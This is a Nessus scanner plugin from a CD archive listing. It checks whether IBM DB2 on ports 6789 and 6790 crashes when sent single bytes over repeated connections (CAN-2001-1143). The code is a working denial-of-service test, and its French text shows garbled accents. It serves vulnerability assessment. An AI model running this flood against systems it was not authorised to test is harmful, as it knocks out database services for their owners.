home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / db2_dos.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  97 lines
  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>, starting 
  3. # from miscflood.nasl
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10871);
  11.  script_bugtraq_id(3010);
  12.  script_version("$Revision: 1.7 $");
  13.  script_cve_id("CAN-2001-1143");
  14.  name["english"] = "DB2 DOS";
  15.  name["francais"] = "DΘni de service contre DB2";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "It was possible to crash
  19. the DB2 database by sending just one byte to it.
  20.  
  21. An attacker  may use this attack to make this
  22. service crash continuously, preventing you
  23. from working properly.
  24.  
  25.  
  26. Solution: upgrade your software
  27.  
  28. Risk factor : High";
  29.  
  30.  
  31.  desc["francais"] = "Il a ΘtΘ possible de
  32. faire planter la base de donnΘes DB2 en 
  33. envoyant juste un octet.
  34.  
  35. Un pirate peut exploiter cette faille 
  36. pour faire planter continuellement ce
  37. service, vous empΩchant ainsi de travailler
  38. correctement.
  39.  
  40.  
  41. Solution: mettez α jour votre logiciel
  42.  
  43. Facteur de risque : ElevΘ";
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Flood against the remote service";
  48.  summary["francais"] = "Surcharge du service distant";
  49.  script_summary(english:summary["english"], francais:summary["francais"]);
  50.  
  51.  script_category(ACT_DENIAL);
  52.  
  53.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
  54.         francais:"Ce script est Copyright (C) 2002 Michel Arboi");
  55.  family["english"] = "Denial of Service";
  56.  family["francais"] = "DΘni de service";
  57.  
  58.  script_family(english:family["english"], francais:family["francais"]);
  59.  script_require_ports(6789, 6790);
  60.  exit(0);
  61. }
  62.  
  63. #
  64.  
  65. function test_db2_port(port)
  66. {
  67.  if (! get_port_state(port))
  68.   return(0);
  69.  
  70.  soc = open_sock_tcp(port);
  71.  if (!soc)
  72.   return(0);
  73.  for (i=0; i<100; i=i+1)
  74.  {
  75.   send(socket:soc, data:string("x"));
  76.   close(soc);
  77.  
  78.   soc = open_sock_tcp(port);
  79.   if (! soc)
  80.   {
  81.    sleep(1);
  82.    soc = open_sock_tcp(port);
  83.    if (! soc)
  84.    {
  85.     security_hole(port);
  86.     return (1);
  87.    }
  88.   }
  89.  }
  90.  close(soc);
  91.  return(1);
  92. }
  93.  
  94. test_db2_port(port:6789);
  95. test_db2_port(port:6790);
  96.  
  97.